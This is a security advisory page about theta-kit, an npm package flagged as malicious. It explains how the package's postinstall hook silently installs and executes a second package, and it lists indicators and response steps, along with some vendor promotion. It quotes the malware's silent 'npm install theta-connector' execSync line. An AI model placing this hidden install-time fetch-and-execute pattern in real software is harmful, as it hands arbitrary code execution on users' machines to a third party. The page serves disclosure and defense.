Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

theta-kitnpm

theta-kit is a confirmed malicious npm package (MAL-2026-5706) that executes malicious code on install (malicious versions 1.0.0, 1.0.1, 1.0.2…). Do not install it — remove it immediately and rotate any exposed credentials.

Malicious code in theta-kit (npm)

MAL-2026-5706
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall theta-kit

What this malware does

package.json declares postinstall: node dist/index.js, and dist/index.js executes Model.resetor() at module top level — meaning both npm install theta-kit and require('theta-kit') hand control to a separate package, 'theta-connector'. resetor() instantiates new ThetaConnector({}) and calls db.queryDBConnect(). If 'theta-connector' is not present, the catch branch silently runs execSync('npm install theta-connector --no-warnings --no-save --no-progress --loglevel silent') and then requires and executes it. The package that ultimately runs is not shipped in this tarball, so its bytes can change at any time without any update to theta-kit. Output is suppressed and errors are swallowed, hiding the fetch-and-execute from the installer. The package also declares a runtime dependency on child_process@^1.0.2, an unrelated registry placeholder sharing a name with Node's built-in module — a confusion pattern that adds a second installer-controlled execution surface. The install-time fetch-and-execute pattern, combined with the silent-self-install fallback and the unrelated 'child_process' registry dep, is unrelated to the package's advertised mobx in-memory DB purpose and gives the maintainer of 'theta-connector' arbitrary code execution on every install or require of theta-kit.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

4 flagged
1.0.01.0.11.0.21.0.3

Indicators of compromise (SHA-256)

09b0737ff5b0b0768e2314b014529b80609632a38dfdc3a9ad6cfd6ab1da9039
30f04104c9e5de8a18da769a2aa50e78546b12ccaf99d7c442aae79277c6e098
4f2b7b976965370ad873f7410cd353a71da0cdbe5d86dcf23a537dab34b98959
8e4af06adb727e8855bb93b3d39906e1aa504a697641cfecad7fbf51dd8e024b
eaf5ecef46a2c9c55015a7ce1b2cbd6fbe4cc2305fb2113c4889b11b26a7231e
f7f4a3e8761d93c4408de9acaf0eee18f4f0146cbef2638669054a4c19beae4b
da0964ff798940752e30878dc90ffb51aca217020a2da059bc8834f95963cbac

Detection & response playbook

Malicious package
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for theta-kit (4 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging theta-kit across your stack and pipelines.

  2. If you installed it — respond

    Remove theta-kit from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.

  3. Did it already run?

    If theta-kit was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks theta-kit before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. theta-kit on npm has been identified as a malicious package (versions 1.0.0, 1.0.1, 1.0.2, 1.0.3 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006013IN-MAL-2026-006026IN-MAL-2026-006014IN-MAL-2026-006021IN-MAL-2026-006015IN-MAL-2026-006025GHSA-ccpw-cfwc-qgw4

References

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks theta-kit-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Explore

theta-kit (npm) malicious package — MAL-2026-5706 | O3 Security